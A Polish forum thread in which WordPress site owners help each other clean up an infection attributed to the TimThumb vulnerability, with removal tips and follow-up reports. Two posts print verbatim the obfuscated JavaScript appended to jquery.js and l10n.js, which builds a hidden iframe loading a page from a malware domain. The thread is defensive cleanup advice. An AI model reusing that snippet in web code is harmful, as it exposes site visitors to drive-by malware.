Wirus na stronie z WP. Jak działać?

[fortunately102]

Witam.

Dziś po wejściu na stronę zobaczyłem "Witryna xx zawiera treści z witryny counter-wordpress.com, która jest znana jako źródło złośliwego oprogramowania. Otwarcie tej witryny grozi zainfekowaniem komputera wirusem."

Ktoś miał może coś podobnego? Co radzicie robić i gdzie najprawdopodobniej mogę znaleźć wirusa? Już pozmieniałem dane do ftp oraz php oraz logowania do wordpressa, teraz ściągam pliki na dysk i zacznę wyszukiwać plików o podobnych nazwach.

Nigdy wcześniej nie miałem ataku na stronę, więc prosiłbym o pomoc.

[d4mi4n18]

U mnie na jednym preclu pojawił się podobny problem. Jadę właśnie nad wodę. Będę późnym wieczorem i postaram się znaleźć rozwiązanie. Pewnie już coś się o tym znajdzie w Google

[Carnagge]

Tez to mialem, ale w zwiazku ze uzywam FF to nie dzialalo tak jak autor sobei zaplanowal i myslalem ze to jakis blad po mojej stronie.

Jest to luka w TimThumb i mozna sie dzieki temu wlamac na serwer. Z tego, co widze to maja problemy ludzie co uzywaja Elegant Themes (moze ktos je atakowal bo wiekszosc ma Timthumb i lecial jakims footprintem).. Na razie chyba nie ma rozwiazanie i czekaja na polatanie TimThumb.

[fortunately102]

na elektrodzie ktos napisal wczoraj o 22 ze tez to ma wiec wyglada to na jakas wieksza akcje, to moze i lepiej bo mi groził niedawno jeden koleś i myślałem już, że to on.

Na stronie na pierwszy rzut oka nie zauważyłem żadnych zmian.

[Paq]

Wczoraj w nocy to już czyściłem. Jest luka w TimThumb Vulnerability. Na stronach zaatakowanych lekko rozjeżdżają się się stopki (ew są na nich jakieś małe kwadraciki) - to właśnie to. Na szczęście łatwo to wyczyścić.

Kod leży dodany do: wp-includes/js/l10n.js i wp-includes/js/jquery/jquery.js

Pod koniec obu plików znajdziecie doklejony kod:

var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B
\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D\x2F
\x6A\x2E\x65\x27\x7D\x38\x28\x35\x2C\x6C\x29\x3B","\x7C","\x73\x70\x6C\x69
\x74","\x65\x6C\x7C\x73\x74\x79\x6C\x65\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x69\x66\x72\x61\x6D\x65\x7C\x31\x70\x78\x7C\x4D\x61\x6B\x65\x46\x72\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69
\x6C\x64\x7C\x69\x64\x7C\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x7C\x62\x6F\x64\x79\x7C\x77\x69\x64\x74
\x68\x7C\x76\x61\x72\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x70\x68\x70\x7C\x68\x74\x74\x70\x7C\x63\x6F\x75\x6E\x74\x65\x72\x7C\x77\x6F\x72\x64\x70\x72
\x65\x73\x73\x7C\x73\x72\x63\x7C\x66\x72\x61\x6D\x65\x7C\x68\x65\x69\x67\x68\x74\x7C\x31\x30\x30\x30\x7C
\x63\x6F\x6D","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function 
(_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3–)
{_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3–){if(_0x2f46x4[_0x2f46x3])
{_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return&
nbsp;_0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));

Cały do usunięcia.

[przemeks]

Dokładnie, większość stron z pakietu ElegantThemes posiadało w zestawie skryptów TimThumb, dlatego autor szablonów alarmował wszystkich klientów, żeby zaktualizowali swoje szablony. Jakie było moje zdziwienie, gdy po powrocie z wczasów, wchodząc na moje strony otrzymywałem komunikat Avasta o robaku na moich stronach :/

[fortunately102]

dzięki Paqu

[Dębica]

Wczoraj w nocy to już czyściłem. Jest luka w TimThumb Vulnerability. Na stronach zaatakowanych lekko rozjeżdżają się się stopki (ew są na nich jakieś małe kwadraciki) - to właśnie to. Na szczęście łatwo to wyczyścić.

Kod leży dodany do: wp-includes/js/l10n.js i wp-includes/js/jquery/jquery.js

Pod koniec obu plików znajdziecie doklejony kod:

var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B
\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D\x2F
\x6A\x2E\x65\x27\x7D\x38\x28\x35\x2C\x6C\x29\x3B","\x7C","\x73\x70\x6C\x69
\x74","\x65\x6C\x7C\x73\x74\x79\x6C\x65\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x69\x66\x72\x61\x6D\x65\x7C\x31\x70\x78\x7C\x4D\x61\x6B\x65\x46\x72\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69
\x6C\x64\x7C\x69\x64\x7C\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x7C\x62\x6F\x64\x79\x7C\x77\x69\x64\x74
\x68\x7C\x76\x61\x72\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x70\x68\x70\x7C\x68\x74\x74\x70\x7C\x63\x6F\x75\x6E\x74\x65\x72\x7C\x77\x6F\x72\x64\x70\x72
\x65\x73\x73\x7C\x73\x72\x63\x7C\x66\x72\x61\x6D\x65\x7C\x68\x65\x69\x67\x68\x74\x7C\x31\x30\x30\x30\x7C
\x63\x6F\x6D","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function 
(_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3–)
{_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3–){if(_0x2f46x4[_0x2f46x3])
{_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return&
nbsp;_0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));

Cały do usunięcia.

Pozwolę sobie tylko dodać, że powyższy kod może się znajdować także w jeszcze jednym miejscu: wp-content/themes/nazwa twojego motywu/js/jquery.js oczywiście należy go też usunąć.

Ślę pozdrowienia

[Paq]

No to ja jeszcze dodam, że kod jest podpinany do także innych projektów na serwerze, gdzie doszło do włamania na WP. Sprawdźcie strony na subdomenach. Mi np. dokleiło kod do katalogu (SEOKatalog) - formułka była taka sama.

[Carnagge]

No tylko, ze problem jest taki, ze Wszyscy podaja jak usunac kod, a ponowne wlamanie mozne nastapic za godizne i z powrotem moga dokleic ten sam kod, wiec to nie jest zbyt dobre rozwiazanie.

[przemeks]

No tylko, ze problem jest taki, ze Wszyscy podaja jak usunac kod, a ponowne wlamanie mozne nastapic za godizne i z powrotem moga dokleic ten sam kod, wiec to nie jest zbyt dobre rozwiazanie.

Należy się całkowicie pozbyć TinThumb ze swojego serwera

[Paq]

ponowne wlamanie mozne nastapic za godizne i z powrotem moga dokleic ten sam kod, wiec to nie jest zbyt dobre rozwiazanie.

Świeży TimThumb do nadpisania.

[radoslaus]

warto sprawdzić stronkę tym - https://sitecheck.sucuri.net/scanner/

jak wyczyścić ten kod - https://techspheria.com/2011/08/phpremotevi...w-to-remove-it/

Sprawdzałem na kilku swoich blogach i wygląda to na skuteczne rozwiązanie.

[Paq]

Na szybko. Macie po tym wirusie problem z logowaniem do panelu admina? Wydaje się, że to nie jest zbieg okoliczności, bo nic nie robiłem.

Warning: Cannot modify header information - headers already sent by (output started at /home/infokosz/domains/infokoszalin.pl/public_html/wp-settings.php:332) in /home/infokosz/domains/infokoszalin.pl/public_html/wp-includes/pluggable.php on line 934

Dodam, że pluginy nie generują problemu - to już sprawdzałem. Widzę, że nie tylko ja mam po tym zarażeniu dalej problemy.

[fortunately102]

poki co zadnych problemow z logowaniem do PA